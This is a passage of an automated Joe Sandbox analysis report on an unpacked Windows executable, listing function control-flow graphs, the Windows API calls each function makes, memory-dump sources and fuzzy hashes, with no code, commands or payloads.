                                                                                                                                                                                                          control_flow_graph 518 14000e3f0-14000e404 519 14000e4f3-14000e4fd 518->519 520 14000e40a-14000e40e 518->520 520->519 521 14000e414-14000e418 520->521 522 14000e483-14000e4a6 call 14000e770 521->522 523 14000e41a-14000e423 521->523 531 14000e4a8-14000e4b5 522->531 532 14000e4ee 522->532 524 14000e451-14000e45b 523->524 525 14000e425 523->525 524->524 528 14000e45d-14000e482 WriteFile 524->528 527 14000e430-14000e43a 525->527 527->527 530 14000e43c-14000e450 call 14000e620 527->530 534 14000e4c5-14000e4d6 WriteFile 531->534 535 14000e4b7-14000e4ba call 14000e620 531->535 532->519 536 14000e4dc-14000e4e8 HeapFree 534->536 539 14000e4bf-14000e4c3 535->539 536->532 539->536
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite$FreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 74418370-0
                                                                                                                                                                                                          • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                                                                                                                                                                          • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap$Value
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2497967046-0
                                                                                                                                                                                                          • Opcode ID: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
                                                                                                                                                                                                          • Instruction ID: c44eb9ef2cf98d3488e4d96c7e244cbf8e5b64558ad0ce04898d2a75112beb9a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1521A336609B40C6DA25CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 546 14000d914-14000d922 547 14000d924-14000d95a wcsncpy wcslen 546->547 548 14000d99e 546->548 549 14000d98a-14000d99c CreateDirectoryW 547->549 550 14000d95c-14000d96b 547->550 551 14000d9a0-14000d9a8 548->551 549->551 550->549 552 14000d96d-14000d97b 550->552 552->549 553 14000d97d-14000d988 552->553 553->549 553->550
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateDirectorywcslenwcsncpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 961886536-0
                                                                                                                                                                                                          • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                                                                                                                                                                          • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 554 14000b538-14000b573 memset 00007FF8B75C5550 CoInitialize
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: 00007C5550Initializememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2511080909-0
                                                                                                                                                                                                          • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                                                                                                                                                                          • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CodeExitProcess
                                                                                                                                                                                                          • String ID: open
                                                                                                                                                                                                          • API String ID: 3861947596-2758837156
                                                                                                                                                                                                          • Opcode ID: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
                                                                                                                                                                                                          • Instruction ID: 9a8e33d82e51c75021cc1a1bc422673ad63e4121514530fd256563005765fdb1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                                                                                                                                                            • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                                                                                                                                                            • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                                                                                                                                                            • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                                                                                                                                                            • Part of subcall function 000000014000B538: 00007FF8B75C5550.COMCTL32 ref: 000000014000B561
                                                                                                                                                                                                            • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                                                                                                                                                            • Part of subcall function 00000001400120D0: RtlAllocateHeap.NTDLL ref: 0000000140012123
                                                                                                                                                                                                            • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CD11
                                                                                                                                                                                                            • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CD42
                                                                                                                                                                                                            • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CDB2
                                                                                                                                                                                                            • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                                                                                                                                                            • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                                                                                                                                                            • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                                                                                                                                                            • Part of subcall function 000000014000D444: RtlAllocateHeap.NTDLL ref: 000000014000D476
                                                                                                                                                                                                            • Part of subcall function 000000014000D444: RtlAllocateHeap.NTDLL ref: 000000014000D491
                                                                                                                                                                                                            • Part of subcall function 0000000140011D30: RtlAllocateHeap.NTDLL ref: 0000000140011D82
                                                                                                                                                                                                            • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                                                                                                                                                            • Part of subcall function 00000001400120D0: RtlReAllocateHeap.NTDLL ref: 0000000140012151
                                                                                                                                                                                                            • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                                                                                                                                                            • Part of subcall function 000000014000C4D0: RtlRemoveVectoredExceptionHandler.NTDLL ref: 000000014000C8A5
                                                                                                                                                                                                            • Part of subcall function 000000014000C4D0: RtlAddVectoredExceptionHandler.NTDLL ref: 000000014000C8C0
                                                                                                                                                                                                            • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                                                                                                                                                            • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                                                                                                                                                            • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                                                                                                                                                            • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                                                                                                                                                            • Part of subcall function 0000000140012210: RtlAllocateHeap.NTDLL ref: 0000000140012266
                                                                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0000000140001258
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$Allocate$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$00007AllocC5550DestroyExitInitializeProcessRemove
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 811689875-0
                                                                                                                                                                                                          • Opcode ID: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
                                                                                                                                                                                                          • Instruction ID: f14933b67cb23f8d7438bd3232522d16ce9264245af44939dd0cca49c0d9e1bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A5108F0A11A4481FA03F7A3F8527E926159B9D7D4F808129BF1D1B3F3DD3A85598B22

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 654 140011d30-140011d6c call 140011ef4 657 140011dec-140011e0b 654->657 658 140011d6e-140011d8e RtlAllocateHeap 654->658 658->657 659 140011d90-140011dc9 memset call 1400167c0 658->659 659->657 662 140011dcb-140011dce 659->662 662->657 663 140011dd0 662->663 664 140011dd2-140011dea call 140016cfc 663->664 664->657
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$AllocateFreememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2774703448-0
                                                                                                                                                                                                          • Opcode ID: b0a2c0981b5be639708a6f3d132545d6a9b78e5287bbc147a43e1ebb83c57dbc
                                                                                                                                                                                                          • Instruction ID: a75182db50c1f984f89b78753495ac0ab196a1c9ad642d63c8067afd0bb8a22e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0a2c0981b5be639708a6f3d132545d6a9b78e5287bbc147a43e1ebb83c57dbc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12213B32605B5086EA1ADB53BC4179AA6A8F7C8FD0F498025AF584BB66DE79C852C340

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                                                                                                                                                            • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                                                                                                                                                            • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                                                                                                                                                            • Part of subcall function 000000014000720C: RtlEnterCriticalSection.NTDLL ref: 0000000140007230
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 547990026-0
                                                                                                                                                                                                          • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                                                                                                                                                                          • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                                                                                                                                                                          • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesDelete
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2910425767-0
                                                                                                                                                                                                          • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                                                                                                                                                                          • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$Allocate$AllocCreateValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3361498153-0
                                                                                                                                                                                                          • Opcode ID: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
                                                                                                                                                                                                          • Instruction ID: 1c20f48a7e0d63c5f07c3edeff385a7070e23dcbb2ee76a36a736f2f2e91a8b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9D0C939A1175092E746AB72A81A3E922A0F75C3C1F901419B70947771DF7E81965A40
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DestroyFreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3293292866-0
                                                                                                                                                                                                          • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                                                                                                                                                                          • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFreeHandleHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1642312469-0
                                                                                                                                                                                                          • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                                                                                                                                                                          • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                                                                                                                                                                          • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1431749950-0
                                                                                                                                                                                                          • Opcode ID: 0c120456f5fc7785235cc7d68fe0eb741bebef968b560416f94c6455390d1b93
                                                                                                                                                                                                          • Instruction ID: 589f1d7f70e1315701d44d764bedbab4a7befc77c71729e42c3369bc9f73c2d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c120456f5fc7785235cc7d68fe0eb741bebef968b560416f94c6455390d1b93
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DC08CE0B1370082FD0FD30BA8943A022E16F0D3C1FC08229AA0C0B338EB3D81544700
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3978063606-0
                                                                                                                                                                                                          • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                                                                                                                                                                          • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1611563598-0
                                                                                                                                                                                                          • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                                                                                                                                                                          • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
